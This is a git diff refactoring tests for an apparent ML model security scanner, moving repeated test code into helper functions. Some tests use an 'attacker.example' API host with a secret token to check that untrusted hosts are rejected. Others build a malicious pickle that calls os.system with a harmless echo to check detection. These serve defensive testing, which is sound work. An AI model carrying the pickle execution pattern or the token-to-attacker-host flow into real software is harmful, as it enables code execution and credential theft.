_recording_fetch(requested_urls, requested_kwargs)) result = auth_client_module.AuthClient().validate_and_set_api_token( "secret-token", @@ -776,13 +764,9 @@ def test_validate_and_set_api_token_uses_environment_host_instead_of_persisted_h fake_config = _FakeCloudConfig(api_host="https://old.promptfoo.app") requested_urls: list[str] = [] - def fake_fetch(url: str, **_kwargs: Any) -> _FakeResponse: - requested_urls.append(url) - return _FakeResponse() - monkeypatch.setenv("MODELAUDIT_API_HOST", "https://enterprise.example:8443") monkeypatch.setattr(auth_client_module, "cloud_config", fake_config) - monkeypatch.setattr(auth_client_module, "fetch_with_proxy", fake_fetch) + monkeypatch.setattr(auth_client_module, "fetch_with_proxy", _recording_fetch(requested_urls)) auth_client_module.AuthClient().validate_and_set_api_token("enterprise-token") @@ -901,33 +885,11 @@ class RedirectResponse(_FakeResponse): def test_get_user_info_rejects_non_https_config_host_before_request(monkeypatch: pytest.MonkeyPatch) -> None: - fake_config = _FakeCloudConfig(api_host="http://attacker.example", api_key="secret-token") - - def fail_fetch(_url: str, **_kwargs: Any) -> _FakeResponse: - raise AssertionError("fetch_with_proxy must not be called for untrusted API hosts") - - monkeypatch.setattr(auth_client_module, "cloud_config", fake_config) - monkeypatch.setattr(auth_client_module.config, "cloud_config", fake_config) - monkeypatch.setattr(auth_client_module, "get_user_email", lambda: "user@example.com") - monkeypatch.setattr(auth_client_module, "fetch_with_proxy", fail_fetch) - - with pytest.raises(ValueError, match="must use HTTPS"): - auth_client_module.AuthClient().get_user_info() + _assert_untrusted_config_host_rejection(monkeypatch, "http://attacker.example", "must use HTTPS") def test_get_user_info_rejects_attacker_https_config_host_before_request(monkeypatch: pytest.MonkeyPatch) -> None: - fake_config = _FakeCloudConfig(api_host="https://attacker.example", api_key="secret-token") - - def fail_fetch(_url: str, **_kwargs: Any) -> _FakeResponse: - raise AssertionError("fetch_with_proxy must not be called for untrusted API hosts") - - monkeypatch.setattr(auth_client_module, "cloud_config", fake_config) - monkeypatch.setattr(auth_client_module.config, "cloud_config", fake_config) - monkeypatch.setattr(auth_client_module, "get_user_email", lambda: "user@example.com") - monkeypatch.setattr(auth_client_module, "fetch_with_proxy", fail_fetch) - - with pytest.raises(ValueError, match="trusted Promptfoo API host"): - auth_client_module.AuthClient().get_user_info() + _assert_untrusted_config_host_rejection(monkeypatch, "https://attacker.example", "trusted Promptfoo API host") def test_get_user_info_accepts_persisted_enterprise_https_host(monkeypatch: pytest.MonkeyPatch) -> None: @@ -935,16 +897,11 @@ def test_get_user_info_accepts_persisted_enterprise_https_host(monkeypatch: pyte requested_urls: list[str] = [] requested_kwargs: list[dict[str, Any]] = [] - def fake_fetch(url: str, **kwargs: Any) -> _FakeResponse: - requested_urls.append(url) - requested_kwargs.append(kwargs) - return _FakeResponse() - monkeypatch.setenv("MODELAUDIT_API_ALLOWED_HOSTS", "enterprise.example") monkeypatch.setattr(auth_client_module, "cloud_config", fake_config) monkeypatch.setattr(auth_client_module.config, "cloud_config", fake_config) monkeypatch.setattr(auth_client_module, "get_user_email", lambda: "user@example.com") - monkeypatch.setattr(auth_client_module, "fetch_with_proxy", fake_fetch) + monkeypatch.setattr(auth_client_module, "fetch_with_proxy", _recording_fetch(requested_urls, requested_kwargs)) auth_client_module.AuthClient().get_user_info() @@ -956,15 +913,41 @@ def test_get_user_info_uses_environment_host_instead_of_persisted_host(monkeypat fake_config = _FakeCloudConfig(api_host="https://old.promptfoo.app", api_key="enterprise-token") requested_urls: list[str] = [] - def fake_fetch(url: str, **_kwargs: Any) -> _FakeResponse: - requested_urls.append(url) - return _FakeResponse() - monkeypatch.setenv("MODELAUDIT_API_HOST", "https://enterprise.example:8443") monkeypatch.setattr(auth_client_module, "cloud_config", fake_config) monkeypatch.setattr(auth_client_module, "get_user_email", lambda: "user@example.com") - monkeypatch.setattr(auth_client_module, "fetch_with_proxy", fake_fetch) + monkeypatch.setattr(auth_client_module, "fetch_with_proxy", _recording_fetch(requested_urls)) auth_client_module.AuthClient().get_user_info() assert requested_urls == ["https://enterprise.example:8443/api/v1/users/me"] + + +def _assert_untrusted_config_host_rejection( + monkeypatch: pytest.MonkeyPatch, case_host: str, case_error_match: str +) -> None: + fake_config = _FakeCloudConfig(api_host=case_host, api_key="secret-token") + + def fail_fetch(_url: str, **_kwargs: Any) -> _FakeResponse: + raise AssertionError("fetch_with_proxy must not be called for untrusted API hosts") + + monkeypatch.setattr(auth_client_module, "cloud_config", fake_config) + monkeypatch.setattr(auth_client_module.config, "cloud_config", fake_config) + monkeypatch.setattr(auth_client_module, "get_user_email", lambda: "user@example.com") + monkeypatch.setattr(auth_client_module, "fetch_with_proxy", fail_fetch) + + with pytest.raises(ValueError, match=case_error_match): + auth_client_module.AuthClient().get_user_info() + + +def _recording_fetch( + requested_urls: list[str], + requested_kwargs: list[dict[str, Any]] | None = None, +) -> Callable[..., _FakeResponse]: + def fake_fetch(url: str, **kwargs: Any) -> _FakeResponse: + requested_urls.append(url) + if requested_kwargs is not None: + requested_kwargs.append(kwargs) + return _FakeResponse() + + return fake_fetch diff --git a/tests/test_cache_cli.py b/tests/test_cache_cli.py index 4b1210309..e73eed456 100644 --- a/tests/test_cache_cli.py +++ b/tests/test_cache_cli.py @@ -95,25 +95,11 @@ def test_cache_cleanup_with_max_age(self): def test_cache_clear_with_custom_dir(self, tmp_path): """Test cache clear with custom cache directory.""" - cache_dir = tmp_path / "custom_cache" - cache_dir.mkdir() - - runner = CliRunner() - result = runner.invoke(cli, ["cache", "clear", "--cache-dir", str(cache_dir)]) - - assert result.exit_code == 0 - assert "Cleared" in result.output + _assert_custom_cache_cli(tmp_path, "clear", "Cleared") def test_cache_stats_with_custom_dir(self, tmp_path): """Test cache stats with custom cache directory.""" - cache_dir = tmp_path / "custom_cache" - cache_dir.mkdir() - - runner = CliRunner() - result = runner.invoke(cli, ["cache", "stats", "--cache-dir", str(cache_dir)]) - - assert result.exit_code == 0 - assert "Cache Statistics" in result.output + _assert_custom_cache_cli(tmp_path, "stats", "Cache Statistics") def test_cache_error_handling(self): """Test cache commands handle errors gracefully.""" @@ -177,3 +163,14 @@ def test_scan_command_has_cache_options(): assert "--no-cache" in result.output assert "--cache-dir" in result.output assert "defaults" in result.output.lower() + + +def _assert_custom_cache_cli(tmp_path: Path, case_command: str, case_output: str) -> None: + cache_dir = tmp_path / "custom_cache" + cache_dir.mkdir() + + runner = CliRunner() + result = runner.invoke(cli, ["cache", case_command, "--cache-dir", str(cache_dir)]) + + assert result.exit_code == 0 + assert case_output in result.output diff --git a/tests/test_cli.py b/tests/test_cli.py index bf4b07f8c..90c6a7cad 100644 --- a/tests/test_cli.py +++ b/tests/test_cli.py @@ -16,6 +16,7 @@ from collections.abc import Iterator from contextlib import contextmanager from datetime import datetime, timezone +from functools import partial from pathlib import Path from typing import Any, cast from unittest.mock import AsyncMock, MagicMock, patch @@ -51,6 +52,10 @@ from modelaudit.utils.tensorflow_compat import has_tensorflow_protobuf_stubs as _has_tf_protos from tests.cli_output import parse_click_json_output from tests.helpers import create_mock_pytorch_zip +from tests.helpers.file_creators import SystemCommandPayload +from tests.helpers.file_creators import ( + write_ordered_hf_tokenizer_json as _write_ordered_hf_tokenizer_json, +) def test_local_txt_zip_prefilter_uses_bounded_zip_probe( @@ -178,23 +183,6 @@ def _make_trusted_shard_parent(path: Path, *, parents: bool = False) -> None: path.chmod(0o755) -def _write_ordered_hf_tokenizer_json( - path: Path, - *, - late_fields: str = "", - padding_size: int = 0, -) -> Path: - padding = f',"padding":"{"x" * padding_size}"' if padding_size else "" - path.write_text( - ( - '{"version":"1.0","added_tokens":[],' - f'"model":{{"type":"BPE","vocab":{{"hello":0}},"merges":[]}}{padding}{late_fields}}}' - ), - encoding="utf-8", - ) - return path - - def _bert_like_multilingual_vocab_bytes(*tail_tokens: str) -> bytes: tokens = [ "[PAD]", @@ -474,41 +462,17 @@ def test_scan_command_help(): def test_scan_invalid_severity_level_option(tmp_path): """Invalid severity override values should fail fast.""" - test_file = tmp_path / "test_file.dat" - test_file.write_bytes(b"test content") - - runner = CliRunner() - result = runner.invoke(cli, ["scan", str(test_file), "--severity", "S101=SEVERE"]) - - assert result.exit_code == 2 - assert "Invalid severity level" in result.output - assert "CRITICAL" in result.output + _assert_invalid_cli_rule_option(tmp_path, "--severity", "S101=SEVERE", "Invalid severity level", "CRITICAL") def test_scan_unknown_rule_code_in_severity_option(tmp_path): """Unknown rule codes in --severity should fail fast.""" - test_file = tmp_path / "test_file.dat" - test_file.write_bytes(b"test content") - - runner = CliRunner() - result = runner.invoke(cli, ["scan", str(test_file), "--severity", "S9999=CRITICAL"]) - - assert result.exit_code == 2 - assert "Unknown rule code" in result.output - assert "S9999" in result.output + _assert_invalid_cli_rule_option(tmp_path, "--severity", "S9999=CRITICAL", "Unknown rule code", "S9999") def test_scan_unknown_rule_code_in_suppress_option(tmp_path): """Unknown rule codes in --suppress should fail fast.""" - test_file = tmp_path / "test_file.dat" - test_file.write_bytes(b"test content") - - runner = CliRunner() - result = runner.invoke(cli, ["scan", str(test_file), "--suppress", "S9999"]) - - assert result.exit_code == 2 - assert "Unknown rule code" in result.output - assert "S9999" in result.output + _assert_invalid_cli_rule_option(tmp_path, "--suppress", "S9999", "Unknown rule code", "S9999") def test_scan_does_not_auto_load_untrusted_local_config(tmp_path: Path) -> None: @@ -1207,6 +1171,7 @@ def test_scan_with_blacklist(tmp_path): # Just check that the command ran and produced some output assert result.output # Should have some output assert result.exit_code == 0 # Command should complete successfully + # With automatic defaults, the specific output format may vary @@ -2537,35 +2502,12 @@ def test_windows_existing_output_open_checks_dacl_write_and_metadata_access( """Existing reports need DACL-enforced write, replace, and metadata access.""" captured: dict[str, object] = {} - class CreateFileW: - argtypes: tuple[object, ...] | None = None - restype: object | None = None - - def __call__( - self, - path: str, - desired_access: int, - share_mode: int, - _security_attributes: object, - creation_disposition: int, - flags: int, - _template: object, - ) -> int: - captured.update( - path=path, - desired_access=desired_access, - share_mode=share_mode, - creation_disposition=creation_disposition, - flags=flags, - ) - return 321 - def open_osfhandle(handle: int, flags: int) -> int: captured["handle"] = handle captured["os_flags"] = flags return 7 - create_file = CreateFileW() + create_file = _create_file_w_mock(captured) kernel32 = types.SimpleNamespace(CreateFileW=create_file) monkeypatch.setattr(ctypes, "WinDLL", lambda *_args, **_kwargs: kernel32, raising=False) monkeypatch.setitem(sys.modules, "msvcrt", types.SimpleNamespace(open_osfhandle=open_osfhandle)) @@ -2597,30 +2539,7 @@ def test_windows_output_temp_file_uses_minimum_access_and_normal_attributes( """Published Windows reports must not retain FILE_ATTRIBUTE_TEMPORARY.""" captured: dict[str, object] = {} - class CreateFileW: - argtypes: tuple[object, ...] | None = None - restype: object | None = None - - def __call__( - self, - path: str, - desired_access: int, - share_mode: int, - _security_attributes: object, - creation_disposition: int, - flags: int, - _template: object, - ) -> int: - captured.update( - path=path, - desired_access=desired_access, - share_mode=share_mode, - creation_disposition=creation_disposition, - flags=flags, - ) - return 321 - - create_file = CreateFileW() + create_file = _create_file_w_mock(captured) kernel32 = types.SimpleNamespace(CreateFileW=create_file) monkeypatch.setattr(ctypes, "WinDLL", lambda *_args, **_kwargs: kernel32, raising=False) monkeypatch.setitem( @@ -3098,6 +3017,7 @@ def test_scan_verbose_mode(tmp_path): # With automatic defaults and new output format, check for successful completion assert result.output # Should have some output assert result.exit_code == 0 # Should complete successfully + # New output format may not contain "Scanning" text @@ -3195,6 +3115,7 @@ def test_format_text_output(): assert "Files:" in clean_output and "5" in clean_output assert "Test issue" in clean_output assert "warning" in clean_output.lower() + # Verbose might include details, but we can't guarantee it @@ -3579,35 +3500,9 @@ def test_format_text_output_check_only_incomplete_coverage_without_findings_is_n def test_format_text_output_skipped_check_bare_analysis_incomplete_remains_clean() -> None: """Skipped applicability checks without outcome markers should not render coverage incomplete.""" - results = { - "files_scanned": 1, - "bytes_scanned": 10, - "duration": 0.1, - "issues": [], - "checks": [ - { - "name": "PyTorch Runtime Version", - "status": "skipped", - "message": "PyTorch runtime version not available; CVE applicability unknown", - "severity": "info", - "location": "model.pt", - "details": { - "analysis_incomplete": True, - "runtime_version_known": False, - "runtime_cve_applicability": "unknown", - "runtime_cve_version_gate": "local_environment_only", - }, - }, - ], - "file_metadata": {}, - "has_errors": False, - } - - output = format_text_output(results, verbose=False) - clean_output = strip_ansi(output) - assert "Incomplete security coverage" not in clean_output - assert "SCAN COVERAGE INCOMPLETE" not in clean_output - assert "NO ISSUES FOUND" in clean_output + _assert_skipped_runtime_check_clean_output( + ("PyTorch Runtime Version"), ("PyTorch runtime version not available; CVE applicability unknown"), ("model.pt") + ) def test_format_text_output_consolidated_check_incomplete_coverage_is_not_clean() -> None: @@ -3675,35 +3570,9 @@ def test_format_text_output_issue_only_incomplete_coverage_with_security_finding def test_format_text_output_runtime_version_skip_does_not_report_incomplete_coverage() -> None: """Expected runtime-version applicability skips should not print incomplete coverage.""" - results = { - "files_scanned": 1, - "bytes_scanned": 10, - "duration": 0.1, - "issues": [], - "checks": [ - { - "name": "CVE PyTorch Version Check", - "status": "skipped", - "message": "PyTorch runtime version unavailable", - "severity": "info", - "location": "weights.pt", - "details": { - "analysis_incomplete": True, - "runtime_version_known": False, - "runtime_cve_applicability": "unknown", - "runtime_cve_version_gate": "local_environment_only", - }, - } - ], - "file_metadata": {}, - "has_errors": False, - } - - output = format_text_output(results, verbose=False) - clean_output = strip_ansi(output) - assert "Incomplete security coverage" not in clean_output - assert "SCAN COVERAGE INCOMPLETE" not in clean_output - assert "NO ISSUES FOUND" in clean_output + _assert_skipped_runtime_check_clean_output( + ("CVE PyTorch Version Check"), ("PyTorch runtime version unavailable"), ("weights.pt") + ) def test_format_text_output_skipped_bare_analysis_incomplete_reports_coverage() -> None: @@ -3807,22 +3676,9 @@ def test_format_text_output_debug_and_info_issues(): def test_format_text_output_fast_scan_duration(): """Test duration formatting for very fast scans (< 0.01 seconds).""" - results = { - "path": "/path/to/model", - "files_scanned": 1, - "bytes_scanned": 512, - "duration": 0.005, # Very fast scan < 0.01 seconds - "issues": [], - "has_errors": False, - } - - output = format_text_output(results, verbose=False) - clean_output = strip_ansi(output) - + # Very fast scan < 0.01 seconds # Should show 3 decimal places for very fast scans - assert "Duration:" in clean_output and "0.005s" in clean_output - assert "Files:" in clean_output and "1" in clean_output - assert "No security issues detected" in clean_output + _assert_short_scan_duration_output((1), (512), (0.005), ("0.005s"), ("1")) def test_scan_huggingface_url_help(): @@ -3995,76 +3851,29 @@ def test_scan_huggingface_preview_matches_final_recursive_inventory(tmp_path: Pa def test_scan_huggingface_preview_reports_gated_and_unknown_access(tmp_path: Path) -> None: - downloaded_dir = tmp_path / "downloaded" - downloaded_dir.mkdir() - (downloaded_dir / "config.json").write_text("{}") - - with ( - patch("modelaudit.cli.is_huggingface_url", return_value=True), - patch( - "modelaudit.cli.get_model_info", - return_value={ - "model_id": "org/gated-model", - "total_size": 4096, - "file_count": 3, - "inventory_status": "partial_unknown_size", - "inaccessible_gated_bytes": 2048, - "inaccessible_gated_file_count": 1, - "unknown_size_count": 1, - }, - ), - patch("modelaudit.cli.download_model", return_value=downloaded_dir), - patch( - "modelaudit.cli.scan_model_directory_or_file", - return_value=create_mock_scan_result(files_scanned=1, issues=[]), - ), - patch("shutil.rmtree"), - ): - result = CliRunner().invoke(cli, ["scan", "--no-cache", "--format", "text", "hf://org/gated-model"]) - - output = strip_ansi(result.output) - assert result.exit_code == 0, output - assert "Size: At least 4.00 KB (3 files)" in output - assert "Access: 1 selected file(s) are gated/inaccessible" in output - assert "Access: 1 selected file size(s) unavailable" in output + _assert_huggingface_preview_access( + tmp_path, + ("org/gated-model"), + (4096), + (3), + ("partial_unknown_size"), + (2048), + ("hf://org/gated-model"), + ("Size: At least 4.00 KB (3 files)"), + ) def test_scan_huggingface_preview_reports_unknown_size_gated_access(tmp_path: Path) -> None: - downloaded_dir = tmp_path / "downloaded" - downloaded_dir.mkdir() - (downloaded_dir / "config.json").write_text("{}") - - with ( - patch("modelaudit.cli.is_huggingface_url", return_value=True), - patch( - "modelaudit.cli.get_model_info", - return_value={ - "model_id": "org/unknown-size-gated-model", - "total_size": 0, - "file_count": 1, - "inventory_status": "gated_inaccessible", - "inaccessible_gated_bytes": 0, - "inaccessible_gated_file_count": 1, - "unknown_size_count": 1, - }, - ), - patch("modelaudit.cli.download_model", return_value=downloaded_dir), - patch( - "modelaudit.cli.scan_model_directory_or_file", - return_value=create_mock_scan_result(files_scanned=1, issues=[]), - ), - patch("shutil.rmtree"), - ): - result = CliRunner().invoke( - cli, - ["scan", "--no-cache", "--format", "text", "hf://org/unknown-size-gated-model"], - ) - - output = strip_ansi(result.output) - assert result.exit_code == 0, output - assert "Size: Unknown size (1 files)" in output - assert "Access: 1 selected file(s) are gated/inaccessible" in output - assert "Access: 1 selected file size(s) unavailable" in output + _assert_huggingface_preview_access( + tmp_path, + ("org/unknown-size-gated-model"), + (0), + (1), + ("gated_inaccessible"), + (0), + ("hf://org/unknown-size-gated-model"), + ("Size: Unknown size (1 files)"), + ) def test_scan_huggingface_metadata_preflight_verbose_log_is_sanitized( @@ -7530,13 +7339,7 @@ def test_scan_huggingface_streaming_routes_unknown_suffix_by_content( """Bounded unknown-suffix files should preserve benign and malicious content routing.""" model_path = create_mock_pytorch_zip(tmp_path / "model.unknown", malicious=malicious) - def fake_hf_hub_download(**download_kwargs: Any) -> str: - local_path = Path(download_kwargs["local_dir"]) / str(download_kwargs["filename"]) - local_path.parent.mkdir(parents=True, exist_ok=True) - local_path.write_bytes(model_path.read_bytes()) - return str(local_path) - - mock_hf_hub_download.side_effect = fake_hf_hub_download + mock_hf_hub_download.side_effect = partial(_copy_hf_fixture, model_path) mock_run_download.side_effect = lambda _operation, download_kwargs, _deadline, _repo_id, *, direct_download: str( direct_download(**download_kwargs) ) @@ -7584,13 +7387,7 @@ def test_scan_huggingface_streaming_selected_pickle_scans_shard_shaped_renamed_p model_path.write_bytes(payload) mock_requests_get.return_value = _FakeRangeResponse(payload) - def fake_hf_hub_download(**download_kwargs: Any) -> str: - local_path = Path(download_kwargs["local_dir"]) / str(download_kwargs["filename"]) - local_path.parent.mkdir(parents=True, exist_ok=True) - local_path.write_bytes(model_path.read_bytes()) - return str(local_path) - - mock_hf_hub_download.side_effect = fake_hf_hub_download + mock_hf_hub_download.side_effect = partial(_copy_hf_fixture, model_path) mock_run_download.side_effect = lambda _operation, download_kwargs, _deadline, _repo_id, *, direct_download: str( direct_download(**download_kwargs) ) @@ -8850,42 +8647,16 @@ def test_is_mlflow_uri(): def test_format_text_output_normal_scan_duration(): """Test duration formatting for normal scans (>= 0.01 seconds).""" - results = { - "path": "/path/to/model", - "files_scanned": 2, - "bytes_scanned": 2048, - "duration": 0.25, # Normal scan >= 0.01 seconds - "issues": [], - "has_errors": False, - } - - output = format_text_output(results, verbose=False) - clean_output = strip_ansi(output) - + # Normal scan >= 0.01 seconds # Should show 2 decimal places for normal scans - assert "Duration:" in clean_output and "0.25s" in clean_output - assert "Files:" in clean_output and "2" in clean_output - assert "No security issues detected" in clean_output + _assert_short_scan_duration_output((2), (2048), (0.25), ("0.25s"), ("2")) def test_format_text_output_edge_case_duration(): """Test duration formatting for edge case exactly at 0.01 seconds.""" - results = { - "path": "/path/to/model", - "files_scanned": 1, - "bytes_scanned": 1024, - "duration": 0.01, # Edge case exactly at threshold - "issues": [], - "has_errors": False, - } - - output = format_text_output(results, verbose=False) - clean_output = strip_ansi(output) - + # Edge case exactly at threshold # Should show 2 decimal places (>= 0.01 branch) - assert "Duration:" in clean_output and "0.01s" in clean_output - assert "Files:" in clean_output and "1" in clean_output - assert "No security issues detected" in clean_output + _assert_short_scan_duration_output((1), (1024), (0.01), ("0.01s"), ("1")) def test_format_text_output_very_fast_scan_with_issues(): @@ -8947,12 +8718,8 @@ def test_exit_code_security_issues(tmp_path): # Create a malicious pickle file evil_pickle_path = tmp_path / "malicious.pkl" - class MaliciousClass: - def __reduce__(self): - return (os.system, ('echo "This is a malicious pickle"',)) - with evil_pickle_path.open("wb") as f: - pickle.dump(MaliciousClass(), f) + pickle.dump(SystemCommandPayload('echo "This is a malicious pickle"', lambda: os.system), f) runner = CliRunner() result = runner.invoke(cli, ["scan", "--format", "text", str(evil_pickle_path)]) @@ -8973,12 +8740,8 @@ def test_exit_code_security_issues_streaming_local_directory(tmp_path: Path) -> evil_pickle_path = tmp_path / "malicious.pkl" expected_global = f"{os.system.__module__}.system" - class MaliciousClass: - def __reduce__(self): - return (os.system, ('echo "This is a malicious pickle"',)) - with evil_pickle_path.open("wb") as f: - pickle.dump(MaliciousClass(), f) + pickle.dump(SystemCommandPayload('echo "This is a malicious pickle"', lambda: os.system), f) runner = CliRunner() result = runner.invoke(cli, ["scan", "--stream", "--format", "text", str(tmp_path)]) @@ -9315,3 +9078,153 @@ def test_scan_invalid_max_size_records_telemetry( assert sensitive_max_size not in repr(mock_record_command.call_args) assert sensitive_max_size not in repr(mock_record_started.call_args) mock_flush.assert_called_once() + + +def _create_file_w_mock(captured: dict[str, object]) -> Any: + class CreateFileW: + argtypes: tuple[object, ...] | None = None + restype: object | None = None + + def __call__( + self, + path: str, + desired_access: int, + share_mode: int, + _security_attributes: object, + creation_disposition: int, + flags: int, + _template: object, + ) -> int: + captured.update( + path=path, + desired_access=desired_access, + share_mode=share_mode, + creation_disposition=creation_disposition, + flags=flags, + ) + return 321 + + return CreateFileW() + + +def _copy_hf_fixture(model_path: Path, /, **download_kwargs: Any) -> str: + local_path = Path(download_kwargs["local_dir"]) / str(download_kwargs["filename"]) + local_path.parent.mkdir(parents=True, exist_ok=True) + local_path.write_bytes(model_path.read_bytes()) + return str(local_path) + + +def _assert_huggingface_preview_access( + tmp_path: Path, + case_model_id: str, + case_total_size: int, + case_file_count: int, + case_inventory_status: str, + case_gated_bytes: int, + case_model_uri: str, + case_expected_size: str, +) -> None: + downloaded_dir = tmp_path / "downloaded" + downloaded_dir.mkdir() + (downloaded_dir / "config.json").write_text("{}") + + with ( + patch("modelaudit.cli.is_huggingface_url", return_value=True), + patch( + "modelaudit.cli.get_model_info", + return_value={ + "model_id": case_model_id, + "total_size": case_total_size, + "file_count": case_file_count, + "inventory_status": case_inventory_status, + "inaccessible_gated_bytes": case_gated_bytes, + "inaccessible_gated_file_count": 1, + "unknown_size_count": 1, + }, + ), + patch("modelaudit.cli.download_model", return_value=downloaded_dir), + patch( + "modelaudit.cli.scan_model_directory_or_file", + return_value=create_mock_scan_result(files_scanned=1, issues=[]), + ), + patch("shutil.rmtree"), + ): + result = CliRunner().invoke(cli, ["scan", "--no-cache", "--format", "text", case_model_uri]) + + output = strip_ansi(result.output) + assert result.exit_code == 0, output + assert case_expected_size in output + assert "Access: 1 selected file(s) are gated/inaccessible" in output + assert "Access: 1 selected file size(s) unavailable" in output + + +def _assert_skipped_runtime_check_clean_output( + case_check_name: str, case_check_message: str, case_location: str +) -> None: + results = { + "files_scanned": 1, + "bytes_scanned": 10, + "duration": 0.1, + "issues": [], + "checks": [ + { + "name": case_check_name, + "status": "skipped", + "message": case_check_message, + "severity": "info", + "location": case_location, + "details": { + "analysis_incomplete": True, + "runtime_version_known": False, + "runtime_cve_applicability": "unknown", + "runtime_cve_version_gate": "local_environment_only", + }, + }, + ], + "file_metadata": {}, + "has_errors": False, + } + + output = format_text_output(results, verbose=False) + clean_output = strip_ansi(output) + assert "Incomplete security coverage" not in clean_output + assert "SCAN COVERAGE INCOMPLETE" not in clean_output + assert "NO ISSUES FOUND" in clean_output + + +def _assert_short_scan_duration_output( + case_file_count: int, + case_byte_count: int, + case_duration: float, + case_expected_duration: str, + case_expected_files: str, +) -> None: + results = { + "path": "/path/to/model", + "files_scanned": case_file_count, + "bytes_scanned": case_byte_count, + "duration": case_duration, + "issues": [], + "has_errors": False, + } + + output = format_text_output(results, verbose=False) + clean_output = strip_ansi(output) + + assert "Duration:" in clean_output and case_expected_duration in clean_output + assert "Files:" in clean_output and case_expected_files in clean_output + assert "No security issues detected" in clean_output + + +def _assert_invalid_cli_rule_option( + tmp_path: Path, case_option: str, case_argument: str, case_message: str, case_detail: str +) -> None: + test_file = tmp_path / "test_file.dat" + test_file.write_bytes(b"test content") + + runner = CliRunner() + result = runner.invoke(cli, ["scan", str(test_file), case_option, case_argument]) + + assert result.exit_code == 2 + assert case_message in result.output + assert case_detail in result.output diff --git a/tests/test_cloud_url_detection.py b/tests/test_cloud_url_detection.py index e105ade48..ee605bfcc 100644 --- a/tests/test_cloud_url_detection.py +++ b/tests/test_cloud_url_detection.py @@ -1,10 +1,13 @@ """Tests for cloud storage URL detection (Requirement 19: External Resource References).""" import json +from pathlib import Path +from typing import cast import pytest from modelaudit.detectors.network_comm import NetworkCommDetector +from modelaudit.scanners.base import IssueSeverity from modelaudit.scanners.manifest_scanner import CLOUD_STORAGE_PATTERNS, ManifestScanner @@ -183,27 +186,11 @@ def test_cloud_url_detection_in_config_json(self, scanner, tmp_path): def test_cloud_url_detection_severity_info(self, scanner, tmp_path): """Test that normal cloud URLs get INFO severity.""" - config_file = tmp_path / "config.json" - config_content = {"weights_url": "s3://legitimate-bucket/model.bin"} - config_file.write_text(json.dumps(config_content)) - - result = scanner.scan(str(config_file)) - - cloud_checks = [c for c in result.checks if c.name == "Cloud Storage URL Detection"] - assert len(cloud_checks) == 1 - assert cloud_checks[0].severity.name == "INFO" + _assert_cloud_url_severity(scanner, tmp_path, "s3://legitimate-bucket/model.bin", "INFO") def test_suspicious_cloud_url_severity_warning(self, scanner, tmp_path): """Test that suspicious cloud URLs get WARNING severity.""" - config_file = tmp_path / "config.json" - config_content = {"weights_url": "s3://malware-bucket/exploit.bin"} - config_file.write_text(json.dumps(config_content)) - - result = scanner.scan(str(config_file)) - - cloud_checks = [c for c in result.checks if c.name == "Cloud Storage URL Detection"] - assert len(cloud_checks) == 1 - assert cloud_checks[0].severity.name == "WARNING" + _assert_cloud_url_severity(scanner, tmp_path, "s3://malware-bucket/exploit.bin", "WARNING") def test_no_cloud_urls_no_findings(self, scanner, tmp_path): """Test that configs without cloud URLs don't produce findings.""" @@ -258,3 +245,15 @@ def test_patterns_are_compiled_regex(self): for pattern, description, _provider in CLOUD_STORAGE_PATTERNS: assert isinstance(pattern, re.Pattern), f"Pattern for {description} is not compiled" + + +def _assert_cloud_url_severity(scanner: ManifestScanner, tmp_path: Path, case_url: str, case_severity: str) -> None: + config_file = tmp_path / "config.json" + config_content = {"weights_url": case_url} + config_file.write_text(json.dumps(config_content)) + + result = scanner.scan(str(config_file)) + + cloud_checks = [c for c in result.checks if c.name == "Cloud Storage URL Detection"] + assert len(cloud_checks) == 1 + assert cast(IssueSeverity, cloud_checks[0].severity).name == case_severity diff --git a/tests/test_core.py b/tests/test_core.py index 514ffa7b9..13c7c084e 100644 --- a/tests/test_core.py +++ b/tests/test_core.py @@ -27,12 +27,11 @@ from dataclasses import replace from pathlib import Path from types import SimpleNamespace -from typing import Any, Literal, cast +from typing import Any, cast import pytest from modelaudit import core as core_module -from modelaudit.analysis.unified_context import UnifiedMLContext from modelaudit.cache import get_cache_manager, reset_cache_manager from modelaudit.cache.optimized_config import normalize_material_scan_config from modelaudit.config import ModelAuditConfig, set_config @@ -74,8 +73,6 @@ ) from modelaudit.utils.helpers import cache_decorator from modelaudit.utils.helpers.secure_hasher import SecureFileHasher -from modelaudit.utils.tensorflow_compat import has_tensorflow_protobuf_stubs as _has_tf_protos -from modelaudit.whitelists import POPULAR_MODELS from tests.helpers import ( create_mock_coreml, create_mock_gguf, @@ -85,11 +82,62 @@ prefix_mock_onnx_with_unknown_field, prefix_mock_onnx_with_unknown_group, ) -from tests.helpers.file_creators import valid_jpeg_bytes, valid_png_bytes +from tests.helpers.file_creators import ( + SystemCommandPayload, + valid_jpeg_bytes, + valid_png_bytes, + write_sparse_safetensors_framing, +) +from tests.helpers.file_creators import ( + build_line_broken_printable_utf8_ambiguous_binary_route as _build_line_broken_printable_utf8_ambiguous_binary_route, +) +from tests.helpers.file_creators import ( + build_printable_utf8_ambiguous_binary_route as _build_printable_utf8_ambiguous_binary_route, +) +from tests.helpers.file_creators import pickle_binunicode as _core_binunicode +from tests.helpers.file_creators import ( + write_delayed_flax_cntk_overlap as _write_delayed_flax_cntk_overlap, +) +from tests.helpers.file_creators import ( + write_hf_tokenizer_json as _write_hf_tokenizer_json, +) +from tests.helpers.file_creators import ( + write_malicious_cntk as _write_malicious_cntk, +) +from tests.helpers.file_creators import ( + write_malicious_lightgbm as _write_malicious_lightgbm, +) +from tests.helpers.file_creators import ( + write_ordered_hf_tokenizer_json as _write_ordered_hf_tokenizer_json, +) +from tests.helpers.file_creators import ( + write_truncated_ordered_hf_tokenizer_json as _write_truncated_ordered_hf_tokenizer_json, +) +from tests.helpers.scanners import install_zip_open_failure, scan_with_whitelisted_finding, without_keras_zip_scanner +from tests.helpers.tensorflow import _build_malicious_tf_savedmodel, _require_tf_protos, build_malicious_tf_metagraph _SYSTEM_GLOBAL_NAMES = ("os.system", "posix.system", "nt.system") +def _install_advanced_handler_selection( + monkeypatch: pytest.MonkeyPatch, + shard: Path, + captured_selection_allowed_paths: list[list[str] | None], + captured_allowed_targets: list[core_module.ValidatedShardTargets | None], +) -> None: + def fake_should_use_advanced_handler( + path: str, + *, + allowed_shard_paths: list[str] | None = None, + allowed_shard_targets: core_module.ValidatedShardTargets | None = None, + ) -> bool: + captured_selection_allowed_paths.append(allowed_shard_paths) + captured_allowed_targets.append(allowed_shard_targets) + return path == str(shard) + + monkeypatch.setattr(core_module, "should_use_advanced_handler", fake_should_use_advanced_handler) + + def test_streaming_precomputed_remote_safetensors_result_skips_local_hash( monkeypatch: pytest.MonkeyPatch, 